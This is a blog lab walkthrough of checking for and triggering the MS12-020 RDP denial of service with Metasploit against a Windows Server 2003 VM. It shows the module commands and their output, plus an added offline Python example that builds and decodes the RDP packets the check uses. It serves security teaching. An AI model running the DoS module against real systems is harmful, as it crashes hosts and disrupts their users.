Exploiting the MS12-020 vulnerability on Windows with Metasploit (MSF)

2019/05/18 17:09 · Notes · Original article · 1,622 · 0

Introduction
If an attacker sends a sequence of specially crafted RDP packets to an affected system, this vulnerability (MS12-020, CVE-2012-0002, a use-after-free in the RDP service) can cause a denial of service or allow remote code execution. By default, the Remote Desktop Protocol (RDP, TCP port 3389) is not enabled on any Windows operating system, and systems that do not have RDP enabled are not at risk. In this lab the vulnerability is used only to knock the target over with a DoS; no public exploit turns it into code execution.

0x01 Lab environment
Attacker: Kali Linux
IP: 192.168.8.130
Target: Windows Server 2003 Enterprise x64 SP2
IP: 192.168.8.129

0x02 Vulnerability verification
Use the msf module auxiliary/scanner/rdp/ms12_020_check to verify whether the target is vulnerable. The check only exercises the MCS channel-join logic and does not crash the target, so it is the module to use during an assessment; the DoS module in the next section takes the host down.

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info

Name: MS12-020 Microsoft Remote Desktop Checker
Module: auxiliary/scanner/rdp/ms12_020_check
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
Royce Davis "R3dy" <rdavis@accuvant.com>
Brandon McCann "zeknox" <bmccann@accuvant.com>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.8.129    yes       The target address range or CIDR identifier
  RPORT    3389             yes       Remote port running RDP (TCP)
  THREADS  100              yes       The number of concurrent threads

Description:
This module checks a range of hosts for the MS12-020 vulnerability.
This does not cause a DoS on the target.

References:
https://cvedetails.com/cve/CVE-2012-0002/
https://technet.microsoft.com/en-us/library/security/MS12-020
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
https://www.exploit-db.com/exploits/18606
https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

After running it, the output reports that the target is vulnerable:

msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389 - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
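As an added example (not code from the original post or from Metasploit), the following Python models the protocol exchange behind the check above. It builds the X.224 Connection Request, MCS Attach User Request and MCS Channel Join Request a checker sends, and decodes the X.224 Connection Confirm, Attach User Confirm and Channel Join Confirm a server returns. The server replies are constructed sample bytes in the shape a Windows RDP server produces, so the code runs offline. The decision rule is the one the check relies on: after the server assigns a user ID, the client asks to join a channel ID that is not its own, and a server that answers rt-successful instead of refusing has not been patched. Two things are assumptions for illustration: the choice of user ID + 1 as the foreign channel, and the rt-user-rejected reply used for the patched case. The Connect-Initial PDU (whose maxChannelIds field gives the DoS module its name) is not built here.

```python
"""Build and decode the RDP (TPKT/X.224/MCS) PDUs used by an MS12-020 check.

Added example; not code from the original post or from Metasploit.
Sample server replies below are constructed, not captured.
"""
import struct

# --- TPKT (RFC 1006) and X.224 framing --------------------------------------
def tpkt(payload: bytes) -> bytes:
    """TPKT header: version 3, reserved 0, 16-bit big-endian total length."""
    return struct.pack(">BBH", 3, 0, 4 + len(payload)) + payload

def x224_data(payload: bytes) -> bytes:
    """X.224 Data TPDU: LI=2, code 0xF0 (DT), 0x80 = end of TSDU."""
    return tpkt(b"\x02\xf0\x80" + payload)

def x224_connection_request() -> bytes:
    """X.224 Connection Request: LI=6, code 0xE0, dst/src ref 0, class 0."""
    return tpkt(b"\x06\xe0\x00\x00\x00\x00\x00")

def is_rdp_connection_confirm(pkt: bytes) -> bool:
    """An X.224 Connection Confirm (code 0xD0) means RDP is listening."""
    return len(pkt) >= 7 and pkt[0] == 3 and pkt[4] == 0x06 and pkt[5] == 0xD0

# --- MCS (T.125) domain PDUs, aligned PER -----------------------------------
# First byte = 6-bit DomainMCSPDU choice << 2; its low two bits carry the
# SEQUENCE optional-presence flag and the top bit of the 4-bit Result.
MCS_ATTACH_USER_REQUEST = 10
MCS_ATTACH_USER_CONFIRM = 11
MCS_CHANNEL_JOIN_REQUEST = 14
MCS_CHANNEL_JOIN_CONFIRM = 15
USER_ID_BASE = 1001   # UserId INTEGER (1001..65535) is encoded as id - 1001
RT_SUCCESSFUL = 0     # T.125 Result value rt-successful

def attach_user_request() -> bytes:
    return x224_data(bytes([MCS_ATTACH_USER_REQUEST << 2]))

def channel_join_request(user_id: int, channel_id: int) -> bytes:
    return x224_data(struct.pack(">BHH", MCS_CHANNEL_JOIN_REQUEST << 2,
                                 user_id - USER_ID_BASE, channel_id))

def _mcs_body(pkt: bytes) -> bytes:
    """Strip TPKT + X.224 DT headers after checking the declared length."""
    if len(pkt) < 8 or pkt[0] != 3:
        raise ValueError("not a TPKT packet")
    if struct.unpack(">H", pkt[2:4])[0] != len(pkt):
        raise ValueError("TPKT length does not match packet size")
    if pkt[4:7] != b"\x02\xf0\x80":
        raise ValueError("not an X.224 Data TPDU")
    return pkt[7:]

def _present_and_result(body: bytes):
    present = (body[0] >> 1) & 1                      # optional field flag
    result = ((body[0] & 1) << 3) | (body[1] >> 5)    # 4-bit Result
    return present, result

def parse_attach_user_confirm(pkt: bytes) -> int:
    """Return the UserId the server assigned; raise if it refused."""
    body = _mcs_body(pkt)
    if len(body) < 4 or body[0] >> 2 != MCS_ATTACH_USER_CONFIRM:
        raise ValueError("not an AttachUserConfirm")
    present, result = _present_and_result(body)
    if result != RT_SUCCESSFUL or not present:
        raise ValueError("attach refused, result %d" % result)
    return USER_ID_BASE + struct.unpack(">H", body[2:4])[0]

def parse_channel_join_confirm(pkt: bytes) -> dict:
    body = _mcs_body(pkt)
    if len(body) < 6 or body[0] >> 2 != MCS_CHANNEL_JOIN_CONFIRM:
        raise ValueError("not a ChannelJoinConfirm")
    present, result = _present_and_result(body)
    initiator, requested = struct.unpack(">HH", body[2:6])
    joined = struct.unpack(">H", body[6:8])[0] if present and len(body) >= 8 else None
    return {"result": result, "initiator": USER_ID_BASE + initiator,
            "requested": requested, "joined": joined}

def ms12_020_verdict(join_confirm: bytes) -> bool:
    """True when a join the server should refuse came back rt-successful."""
    return parse_channel_join_confirm(join_confirm)["result"] == RT_SUCCESSFUL

def run_check(attach_confirm: bytes, join_confirm: bytes):
    """Replay the decision against recorded or constructed replies."""
    user_id = parse_attach_user_confirm(attach_confirm)
    foreign = user_id + 1   # assumption: a channel this user does not own
    return channel_join_request(user_id, foreign), ms12_020_verdict(join_confirm)

# --- Constructed sample replies (shape of a Windows RDP server's answers) ----
SAMPLE_CONNECTION_CONFIRM = bytes.fromhex("0300000b06d00000123400")
SAMPLE_ATTACH_USER_CONFIRM = bytes.fromhex("0300000b02f0802e000006")        # user 1007
SAMPLE_JOIN_OK = bytes.fromhex("0300000f02f0803e00000603f003f0")           # unpatched: 1008 joined
SAMPLE_JOIN_REFUSED = bytes.fromhex("0300000d02f0803de0000603f0")          # patched: rt-user-rejected (assumed)

if __name__ == "__main__":
    print("RDP listening:", is_rdp_connection_confirm(SAMPLE_CONNECTION_CONFIRM))
    for name, reply in (("unpatched", SAMPLE_JOIN_OK), ("patched", SAMPLE_JOIN_REFUSED)):
        req, vuln = run_check(SAMPLE_ATTACH_USER_CONFIRM, reply)
        print(name, "sent", req.hex(), "vulnerable:", vuln)
```

The X.224 Connection Request and Attach User Request built here are byte-for-byte the short PDUs the check module sends; only the channel-ID choice and the refusal reply are assumed.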

0x03 Exploitation
msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  192.168.8.129    yes       The target address
  RPORT  3389             yes       The target port (TCP)
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed

After the module runs, the target Windows Server 2003 blue-screens and goes down. The module sends its 210-byte packet sequence without waiting for replies and then re-checks port 3389; "seems down" simply means RDP stopped answering. Because the crash is a kernel-mode fault that takes the whole host with it, run the DoS module only against lab machines and use the check module when assessing production systems.

Article URL: http://www.ouyangxiaoze.com/2019/05/81.html
Copyright notice: This is an original article and its copyright belongs to 欧阳小泽. Sharing is welcome; please keep the source when republishing.